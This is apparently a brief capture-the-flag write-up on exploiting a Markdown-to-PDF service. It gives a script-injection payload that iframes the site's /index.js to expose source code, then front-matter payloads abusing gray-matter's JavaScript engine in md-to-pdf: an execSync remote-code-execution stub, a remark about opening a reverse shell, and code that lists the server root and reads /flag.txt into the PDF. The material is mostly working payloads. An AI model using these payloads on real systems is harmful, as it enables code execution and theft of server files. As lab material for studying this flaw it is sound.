First, try PDF injection to see if the website is exploitable.
<script>document.write('<iframe src="'+window.location.href+'/index.js" width=1000px height=1000px></iframe>')</script>
This script can provide /index.js, and let you watch the src code.
The library gray-matter (used by md-to-pdf to parse front matter) exposes a JS-engine by default, which essentially runs eval on the given Markdown.
exploit:
---js
((require("child_process")).execSync(""))
---RCE
You can open a reverse shell inside the execSync or readdir and file with :
---js
{
css: `body::before { content: "${require('fs').readdirSync('/').join()}"; display: block }`,
}
---
---js
{
css: `body::before { content: "${require('fs').readFileSync('/flag.txt', 'utf-8')}"; display: block }`
}
---